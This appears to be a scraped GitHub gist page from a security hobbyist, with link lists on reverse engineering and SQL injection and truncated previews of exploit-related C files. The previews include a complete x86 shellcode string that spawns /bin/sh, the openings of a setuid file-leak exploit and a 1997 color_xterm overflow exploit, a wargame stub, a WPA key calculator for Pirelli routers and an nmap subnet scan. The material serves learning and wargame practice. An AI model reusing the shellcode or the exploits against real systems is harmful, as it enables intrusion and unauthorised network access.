- http://jbremer.org/x86-api-hooking-demystified/
- http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide
- http://blog.praty.net/?p=235
- https://github.com/RC1140/hackfortress
- Very goods tricks to avoid reversing by the author of a challenge.
- Antidebug trick using constructor.
- http://radare.org/get/rootedlabs2013-radare.pdf
- http://www.ropshell.com/peda/
- http://pythonarsenal.erpscan.com/
- http://code.google.com/p/idapathfinder/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| int main() { | |
| execl("/vortex/vortex4", NULL); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<string.h> | |
| #if 0 | |
| char SC[] = "\xeb\x1d\x5b\x31\xc0\x67\x89\x43\x07\x67\x89\x5b\x08\x67\x89\x43\x0c" | |
| "\x31\xc0\xb0\x0b\x67\x8d\x4b\x08\x67\x8d\x53\x0c\xcd\x80\xe8\xde\xff" | |
| "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42" | |
| "\x42"; | |
| #else |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include "shellcode.h" | |
| int main(int argc, char* argv[]) { | |
| if (argc < 2) { | |
| fprintf(stderr, "usage: %s <command> <arg1> ...\n", argv[0]); | |
| return 1; | |
| } |
packz
/ exploit.c
Created
May 13, 2012 19:57
Simple file leakage exploit example. Original from http://0x80.org/blog/?p=640
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * [qnix:/0x80]$ ls -la getroot password | |
| * -r-sr-x--- 1 root qnix 8966 2012-01-11 17:32 getroot | |
| * -r-------- 1 root root 11 2012-01-11 15:00 password | |
| */ | |
| #include<unistd.h> | |
| #include<stdlib.h> | |
| #include<stdio.h> | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * color_xterm buffer overflow exploit for Linux with non-executable stack | |
| * Copyright (c) 1997 by Solar Designer | |
| * | |
| * Compile: | |
| * gcc cx.c -o cx -L/usr/X11/lib \ | |
| * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//` | |
| * | |
| * Run: | |
| * $ ./cx |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<stdlib.h> | |
| void print_key(char p[], int f) { | |
| printf("key: "); | |
| int cycle; | |
| for (cycle = 0 ; cycle < 8 ; cycle++) { | |
| printf("%c", p[cycle]); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * | |
| * Implementazione dello script originariamente al seguente URL | |
| * | |
| * http://www.evilsocket.net | |
| * /1126/script-per-il-calcolo-della-chiave-wpa-nei-router-fastweb-pirelli.html | |
| * | |
| * http://wifiresearchers.wordpress.com/ | |
| * | |
| * |
-
http://www.offensive-security.com/metasploit-unleashed/
$ nmap -v -sV 192.168.0.0/24
- Advanced SQLi exploitation with FILE_PRIV
- SQL injection by blackhat academy
- Creating Backdoors Using SQL Injection
- False SQL Injection and Advanced Blind SQL Injection
- https://www.pentesterlab.com/from_sqli_to_shell.html
- http://blog.y-shahinzadeh.ir/2012/07/bypassing-mysql_real_escape_string-and-magic_quotes_gpc/
- http://ceriksen.com/2013/01/27/vulnerability-chaining-magic-quotes-bypass-with-hexadecimal-literals-and-data-exfiltration/